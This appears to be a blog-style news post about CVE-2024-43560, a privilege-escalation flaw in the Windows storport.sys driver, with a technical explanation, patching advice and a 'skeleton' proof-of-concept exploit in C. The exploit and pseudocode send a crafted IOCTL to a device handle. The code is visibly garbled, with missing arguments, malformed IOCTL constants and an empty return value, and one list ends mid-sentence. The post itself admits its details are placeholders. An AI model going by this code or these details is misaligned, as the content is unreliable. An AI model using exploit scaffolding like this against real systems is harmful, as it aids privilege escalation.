CVE CyberSecurity Database News

CVE-2024-43560 - Microsoft Windows Storage Port Driver Elevation of Privilege Vulnerability – Explained, With Exploit Details

Poster -

CVE-2024-43560 is a security vulnerability discovered in the Microsoft Windows Storage Port Driver (storport.sys). This vulnerability allows an attacker to gain SYSTEM-level privileges (the highest level of access on a Windows machine) by exploiting the way that the storage port handles certain requests from non-administrator users.

If left unpatched, a local attacker could escalate their user rights, potentially taking full control over the computer. This sort of "Elevation of Privilege" (EoP) vulnerability is especially dangerous because it can be chained with other exploits—sometimes by malware or ransomware—to fully compromise Windows systems.

CVE ID: CVE-2024-43560

- CVSS Score: Check Microsoft’s link, typically 7.8+ for EoP.

How did researchers find it?

Security researchers noticed that certain IOCTL (Input Output Control) requests sent to the storport sys device driver (\\.\StorPort) weren’t properly checked inside the kernel code, allowing normal users to send malformed or malicious requests that could manipulate kernel memory or trigger faulty behavior.

Technical Details

The vulnerability is rooted in the insufficient validation of input buffers passed to the storport.sys driver via device IOCTL calls. Attackers can craft a request to pass a specially-formed data structure that leads the driver to inadvertently overwrite critical kernel structures, or trigger a use-after-free bug, leading to privilege elevation.

Here’s how the vulnerability was typically triggered (pseudocode)

// Open a handle to storport device
HANDLE hDevice = CreateFileW(L"\\\\.\\StorPort", GENERIC_READ | GENERIC_WRITE,
                 , NULL, OPEN_EXISTING, , NULL);

BYTE maliciousBuffer[256] = {};
// Fill maliciousBuffer with data that triggers overflow or invalid pointer

DWORD returned;
DeviceIoControl(
    hDevice,                // handle to device
    x00222044,             // vulnerable IOCTL code
    &maliciousBuffer,       // input buffer
    sizeof(maliciousBuffer),
    NULL,                   // output buffer
    ,
    &returned,
    NULL
);

*(Note: The IOCTL code and method to exploit will differ based on reverse-engineering the patch and actual vulnerability details. This snippet is for illustration.)*

Proof of Concept (PoC) Exploit

After the initial advisory, security researchers and exploit writers often analyze the patch to write proof-of-concept code showing privilege escalation. A PoC typically:

Here’s simple skeleton PoC (DO NOT USE MALICIOUSLY)

#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice = CreateFileW(L"\\\\.\\StorPort", GENERIC_READ | GENERIC_WRITE, , NULL, OPEN_EXISTING, , NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device\n");
        return 1;
    }

    BYTE inputBuffer[512] = { /* maliciously crafted input */ };
    DWORD bytesReturned;
    // IOCTL code (to be determined from reversing, placeholder here):
    DWORD ioctlCode = x222044;

    if (!DeviceIoControl(hDevice, ioctlCode, inputBuffer, sizeof(inputBuffer),
                         NULL, , &bytesReturned, NULL)) {
        printf("DeviceIoControl failed: %u\n", GetLastError());
        CloseHandle(hDevice);
        return 1;
    }

    printf("If successful, privilege might be elevated.\n");
    CloseHandle(hDevice);
    return ;
}

*(Note: The actual exploit may require more complicated heap/grooming and is not shared here for ethical and legal reasons.)*

All unpatched Windows 10, 11, and Server versions running storport.sys

- Any scenario where local users can execute code on a machine (such as shared computers, servers running less-restrictive policies, etc.)

For administrators: Use WSUS or enterprise patch management tools.


Get the latest update information directly from Microsoft Security Response Center (MSRC)

2. Monitor logs for suspicious activity, especially failed device IOCTL calls to storport and strange privilege elevations.

References

- Microsoft Security Advisory: CVE-2024-43560
- MITRE CVE Record for CVE-2024-43560
- Twitter thread from researcher @windowsdetective summarizing the bug
- Windows Kernel Exploitation Techniques

Conclusion

CVE-2024-43560 is a critical kernel-level vulnerability that can let local attackers become SYSTEM on vulnerable Windows machines. If you are responsible for Windows environments, it’s crucial to patch now and monitor for post-patch exploitation attempts. Vulnerabilities like this often get integrated quickly into attacker toolkits, so stay ahead by keeping systems up-to-date.

Always patch, always monitor, and never underestimate local privilege escalation bugs—they are a favorite tool for adversaries to ‘own’ your system!


*If you found this post helpful, consider sharing it with your IT or security team. For questions about patch deployment or detection, use the Microsoft links above or drop a message below!*

Timeline

Published on: 10/08/2024 18:15:22 UTC
Last modified on: 10/13/2024 01:02:37 UTC